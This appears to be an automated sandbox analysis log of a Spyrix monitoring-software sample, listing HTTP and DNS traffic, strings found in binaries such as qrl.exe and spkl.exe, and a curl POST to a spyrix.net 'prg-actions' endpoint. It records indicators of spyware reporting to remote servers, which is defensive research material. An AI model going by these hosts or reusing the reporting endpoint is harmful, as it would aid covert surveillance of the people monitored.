Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/ButtonTemplate-fd9601a7.css HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://dashboard.spyrix.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/ButtonText-ead06ca1.css HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://dashboard.spyrix.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Modal-04ffda94.css HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://dashboard.spyrix.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Input-34212571.css HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://dashboard.spyrix.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/en-ef960fb7.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://cdn.cdndownload.net/dashboard30/assets/index-004f4025.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/index-1178777c.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/ConfirmPhoneModal.module-3f369b32.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Text.vue_vue_type_script_setup_true_lang-a664542d.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: dashboard.spyrix.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/en-08b2a987.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/index-7e7c447a.css HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://dashboard.spyrix.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Copyright.vue_vue_type_script_setup_true_lang-05301fe7.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/index-1178777c.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Button.module-6d4e91b8.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/ButtonTemplate.module-c837805f.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/en-5393c481.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Text.vue_vue_type_script_setup_true_lang-a664542d.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/en-ef960fb7.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/ConfirmPhoneModal.module-3f369b32.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/ButtonText.module-c769b9ae.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Modal.module-d62c47b8.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Button.vue_vue_type_script_setup_true_lang-56edf5a6.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/ButtonText.vue_vue_type_script_setup_true_lang-1bda6e81.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/useValidation-954c07e6.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Input.vue_vue_type_script_setup_true_lang-31858815.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/loop-c45f0f1e.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/ButtonTemplate.module-c837805f.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Copyright.vue_vue_type_script_setup_true_lang-05301fe7.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Button.module-6d4e91b8.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Modal.module-d62c47b8.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/ButtonText.module-c769b9ae.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Button.vue_vue_type_script_setup_true_lang-56edf5a6.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Nunito-Bold-765bfff4.woff2 HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://cdn.cdndownload.net/dashboard30/assets/index-93c74fef.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/useValidation-954c07e6.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Input.vue_vue_type_script_setup_true_lang-31858815.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/loop-c45f0f1e.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/ButtonText.vue_vue_type_script_setup_true_lang-1bda6e81.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: qrl.exe	String found in binary or memory: Usage: curl [options...] <url>
Source: qrl.exe, 00000047.00000002.2582114803.00000000005F2000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: qrl.exe, 00000047.00000002.2582114803.00000000005F2000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: Usage: curl [options...] <url>3[_U[_}[_
Source: qrl.exe, 00000049.00000002.2606650716.00000000005F2000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: qrl.exe, 00000049.00000002.2606650716.00000000005F2000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: Usage: curl [options...] <url>3[_U[_}[_
Source: qrl.exe, 0000004B.00000000.2579396035.00000000005F2000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: qrl.exe, 0000004B.00000000.2579396035.00000000005F2000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: Usage: curl [options...] <url>3[_U[_}[_
Source: qrl.exe, 0000004E.00000000.2603252461.00000000005F2000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: qrl.exe, 0000004E.00000000.2603252461.00000000005F2000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: Usage: curl [options...] <url>3[_U[_}[_

Source: spkl.exe, 00000038.00000003.2483675569.0000000007720000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: SearchID="http://www.myspace.com/search/" equals www.myspace.com (Myspace)
Source: spkl.exe, 00000038.00000002.2742570837.000000000457B000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.myspace.com/search/ equals www.myspace.com (Myspace)
Source: spkl.exe, 00000038.00000003.2483675569.0000000007720000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: msgID="http://www.myspace.com/my/mail" equals www.myspace.com (Myspace)

Source: global traffic	DNS traffic detected: DNS query: filedn.com
Source: global traffic	DNS traffic detected: DNS query: cdnbaynet.com
Source: global traffic	DNS traffic detected: DNS query: swtb-download.spyrix-sfk.com
Source: global traffic	DNS traffic detected: DNS query: dashboard.spyrix.com
Source: global traffic	DNS traffic detected: DNS query: spyrix.net
Source: global traffic	DNS traffic detected: DNS query: cdn.cdndownload.net
Source: global traffic	DNS traffic detected: DNS query: www.google.com

Source: unknown

HTTP traffic detected: POST /dashboard/prg-actions HTTP/1.1Host: spyrix.netUser-Agent: curl/7.64.0Accept: */*Content-Length: 426Content-Type: application/x-www-form-urlencoded

Source: spkl.exe, 00000038.00000002.2750231481.0000000006A70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: HTTPS://DASHBOARD.SPYRIX.COM/
Source: spkl.exe, 00000038.00000002.2742570837.000000000456C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: HTTPS://SPYRIX.NET/DASHBOARD/PRG-ACTIONS
Source: qrl.exe, 00000047.00000002.2582114803.00000000005F2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 00000049.00000002.2606650716.00000000005F2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 0000004B.00000000.2579396035.00000000005F2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 0000004E.00000000.2603252461.00000000005F2000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: http://.css
Source: qrl.exe, qrl.exe, 00000047.00000002.2582114803.00000000005F2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 00000049.00000002.2606650716.00000000005F2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 0000004B.00000000.2579396035.00000000005F2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 0000004E.00000000.2603252461.00000000005F2000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: http://.jpg
Source: [space]= .tmp, 00000016.00000003.2457362812.0000000003408000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.1875219157.0000000003321000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.certum.pl/ca.crl0:
Source: [space]= .tmp, 00000016.00000003.2457362812.0000000003408000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.1875219157.0000000003321000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.certum.pl/l3.crl0a
Source: [space]= .tmp, 00000016.00000003.2457362812.0000000003408000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.1875219157.0000000003321000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: [space]= .tmp, 00000016.00000003.2457362812.0000000003408000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.1875219157.0000000003321000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: curl.exe, 00000011.00000003.1867162261.0000000002B0C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: curl.exe, 00000011.00000003.1867162261.0000000002B0C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/gsgccr45codesignca2020.crl0
Source: curl.exe, 00000011.00000003.1867162261.0000000002B0C000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000011.00000003.1867203455.0000000002B38000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000011.00000003.1859136273.0000000002B35000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: svchost.exe, 00000008.00000002.2689351113.0000027405600000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000008.00000003.1559425141.0000027405470000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: [space]= .exe, 00000007.00000002.1804766822.0000000002FB7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://filedn.com
Source: [space]= .exe, 00000007.00000002.1804766822.0000000002FB7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://filedn.comd
Source: qrl.exe, qrl.exe, 00000047.00000002.2582114803.00000000005F2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 00000049.00000002.2606650716.00000000005F2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 0000004B.00000000.2579396035.00000000005F2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 0000004E.00000000.2603252461.00000000005F2000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: http://html4/loose.dtd
Source: qrl.exe, 00000047.00000002.2582114803.00000000005F2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 00000049.00000002.2606650716.00000000005F2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 0000004B.00000000.2579396035.00000000005F2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 0000004E.00000000.2603252461.00000000005F2000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: http://https://-.://%s%s%s/%s
Source: spkl.exe, 00000038.00000003.2422306843.00000000044E1000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2691175840.0000000000929000.00000040.00000001.01000000.00000014.sdmp, spmm.exe, 0000004D.00000000.2590049471.00000000005EA000.00000002.00000001.01000000.00000018.sdmp	String found in binary or memory: http://neftali.clubdelphi.com/
Source: [space]= .tmp, 00000016.00000003.2457362812.0000000003408000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.1875219157.0000000003321000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.certum.pl0.
